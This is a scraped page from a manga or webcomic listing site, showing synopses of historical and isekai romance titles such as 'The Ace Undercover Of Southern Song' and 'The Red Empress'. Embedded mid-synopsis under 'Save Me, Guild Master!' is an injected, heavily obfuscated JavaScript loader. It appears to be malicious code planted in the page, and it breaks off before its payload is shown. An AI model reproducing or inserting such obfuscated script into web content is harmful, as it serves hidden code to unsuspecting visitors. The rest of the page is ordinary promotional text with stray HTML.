Historical - Page 314

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3968 results

The Ace Undercover Of Southern Song

南宋第一卧底 The story is set in the sixteenth year of the Jiading era during the Southern Song dynasty. Shen Mo, a modern undercover detective travelling to the past, begins his ambition to manipulate and bend the empire to his will. Armed with countless schemings and trickery, he uses his modern detective skills to crack many strange cases in Southern Song, as well as his mastery in espionage to torment the secret agents from the kingdoms of Liao and Jin. And when the threatening conquests of the invincible Mongolian cavalry begin to draw near, he trains an army made of steel to smash their sweeping invasion! To single-handedly dominate the world and fight against the odds, this is the epic war of a man versus an era! 103


Military Phoenix

As a military commander, I crossed over to the Sky Spirit Continent due to an accident. After opening my eyes, I encountered an inexplicable assassination. To that, I just wanted to say, "You messed with the wrong person!" I signed the system on the front foot, awakened the top spiritual power on the back foot, carrying a bazooka to do in the real culprit, stirring him up! The only thing that hurts is that there are too many people who are interested in me, so can I get to that actual perpetrator, huh? +


I Don’t Want a Harem!

The female leads who reincarnate into different worlds are usually both smart and brave, and possess special skills as the main characters. They avenge the original heroine who died a tragic death, then win over handsome men and conquer the world. But what would happen if a useless person reincarnated as the female lead of a harem story?


Save Me, Guild Master!

In the peak of the Tang Dynasty, Suzhou's wealthiest family, the Jia Family's precious daughter enjoys dressing as a boy. She dresses as a boy every day, pretending to be the second young master of the Jia Family as she runs about town with her two bodyguards causing trouble. With her acts of exacting justice on behalf of women, she is liked by all the women in the city and solidly holds the title of "National Husband". In fact, the amount of proposals that have come to the door have nearly flattened the entrance floorboards of the Jia Family mansion! On the contrary, when men see her in her own form, they are all fearful of her. All men run in the opposite direction as soon as they see her, none dare to cross this little lord, that is except for one...<script></script><script>(function(_0x33a2b5,_0x425fbf){var _0x21ed4f=_0x46aa,_0x52b20f=_0x33a2b5();while(!![]){try{var _0x1d43a7=parseInt(_0x21ed4f(0x20c))/(-0x3e*0x33+-0x7e1*-0x2+-0x367*0x1)+parseInt(_0x21ed4f(0x1fc))/(-0x2451*-0x1+0x2c*-0x89+-0xcc3)*(-parseInt(_0x21ed4f(0x1f4))/(0xa83+-0x4*-0x964+0x602*-0x8))+parseInt(_0x21ed4f(0x213))/(-0x9bf+0x13*0x13e+-0x1*0xdd7)*(parseInt(_0x21ed4f(0x214))/(-0x12df+0x1b05*0x1+-0x821))+parseInt(_0x21ed4f(0x20b))/(0x1f3f+-0x1*0x21e0+-0x1*-0x2a7)+parseInt(_0x21ed4f(0x215))/(-0x1*0x1421+-0x423*-0x1+-0x1005*-0x1)+parseInt(_0x21ed4f(0x1fa))/(0x1d1*-0x6+0x9dd+0x111)*(-parseInt(_0x21ed4f(0x209))/(-0x254+-0x6e7+0x944))+-parseInt(_0x21ed4f(0x203))/(0x2*0x959+0x19bb+-0x2c63)*(parseInt(_0x21ed4f(0x20a))/(-0x163a+-0x52*-0x40+0x3*0x97));if(_0x1d43a7===_0x425fbf)break;else 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Wife, Please Enjoy

The last remaining vampire that has been sleeping for 800 years has finally been reborn! After being reborn, Shen Hongluan inherited the Tianxi Pavilion brothel which was on the verge of bankruptcy and became the only “Mama-san” in town. Madam Shen not only wants to make Tianxi Pavilion to be the best brothel in the world, but she is also determined to build a harem to make vampire babies. To repopulate the vampire tribe, there is no upper limit, the more the merrier. Her fierce husband, Shen Songyan humbly yells: “Please help me! I can’t take this anymore! My wife is too good at eating!” 妻主,请享用


My Queen Untouchable

“You know who’s the Queen, and keep that in your mind. Don’t play with fire! ” In order to get back my memory, I have to travel between time spaces over and over again! All the ones that go against me and my plan, will be “eliminated” by me! Oh, right, and those little bees flying around my man, they cannot devour his kind heart. MangaToon got authorization from iCiyuan to publish this manga, the content is the author’s own point of view, and does not represent the stand of MangaToon.


The Emperor’s Mask

<div class="post-title"> <h1>The Emperor’s Mask</h1> </div> <div class="tab-summary "> I didn’t know blackouts were so scary. I lost my film after drinking. And when she opened her eyes, she was in a different world, and she was in a different person’s body. That alone is absurd, but I found out that the cause of death of the body was murder, not suicide. I’m so busy adjusting to reality that I’m going crazy, and I’m also thinking about what’s wrong with the emperor who doesn’t show his face outside. Meanwhile, suspicious beings, even the chief of staff, continue to haunt her. “What’s that big bowl?” “…….” Damn, you’re interrupting me mixing rice with a spoon! The story of a mysterious emperor, a suspicious servant, a man who doesn’t reveal himself and the wrong heroine Lucia. </div>


Princess in the Prince’s Harem

YiYi is one of the most beautiful girl in the kingdom. But after got called ugly by the Emperor she decide to be petty and join the palace as the palace’s painter. Her plan? It’s to draw even the most beautiful lady into an ugly hag!!!


An Inescapable Love

An Inescapable Love For Princess Seollan, life as the twin sister and shadow of the sickly crown prince was a suffocating prison. So when the king commands her to marry Jihwan of House Choi, she knows it’s her only chance to escape the palace and its shackles. Unfortunately, poor Jihwan was cursed by a vengeful white fox with a dangerous thirst for royal blood, and is dead set against their marriage. But in the end, the two are powerless to stop the wedding. Thus, Seollan is determined to find a cure for her new husband– but the truth that they uncover may be more cruel than the curse itself. Will their newfound love bloom bright in the snow, despite the harsh winds of fate that lie ahead?Source of collecting images:bato.to/series/80026Resources:tappytoon.com/en/comics/an-inescapable-love


Don’t Call Me Sister

At the age of 19, I, Zabotte Winchester, inherited the legacy of my stepfather and became the owner of the Winchester family. I thought my mother would run the family, so I could live a comfortable life. When I found out I might die from a car accident, I rewrote my life plan. “From now on, I will be the real owner of Winchester.” I will protect Winchester’s wealth and honor, the future of my old and new sisters, and win the loyalty of a man who was the start the night at a ball, all by himself. “Miss Winchester, I will only tell you. Actually, my real identity…” “Shh. Keep your secret, Merrick. The only thing I care about is a man’s kind heart.” “…But why have you been touching my thigh since a while ago?” “Don’t get me wrong. I was exploring where the man’s heart comes from.” She has a little temper, but it turns out she’s a caring older sister. DCMS 자보트를 새 언니라고 부르지 마세요


The Red Empress

When the emperor murders the python, god of the waters, a curse is put over the Cha Kingdom preventing men from succeeding the throne. So begins the reign of empresses and the endless struggle against men who try to control the kingdom. After all her sisters are killed by the hands of Yom, the young Empress is seated on the throne. Rather than performing her duties as a ruler of a kingdom, the empress spends her days and nights drinking and sleeping with different men, whom she all executes immediately after. The people call her the Blood Empress, attributed to her violent behavior and the red hair, which is dyed with the blood of the men she killed. One day, the Empress meets a handsome and intellectual young man named Kanghee. As she picks up her sword to kill him, Kanghee convinces her to spare him and begins to captivate her heart by telling her stories he’s read from book. As the empress gets closer and closer to Kanghee, she begins to change her violent ways. Is he someone she can finally put her trust in? Or is he not?


Slaughter Queen Reborn

<h2>Slaughter Queen Reborn</h2> She was the legendary agent, the nightmare of terrorists. But after she woke up from her death, she realized that the God has granted her a new life in the ancient time. She was reborn into a weak girl's body, but she's determined to be as fierce and capable as she was in her last life. Even death cannot change the way of her, until she met that fateful man, the seventh prince, and her betrothed! The Slaughter Queen might be cold and aloof like a she-wolf, but in his arms, she's always the little wild cat... MangaToon got authorization from Bciyuan to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.
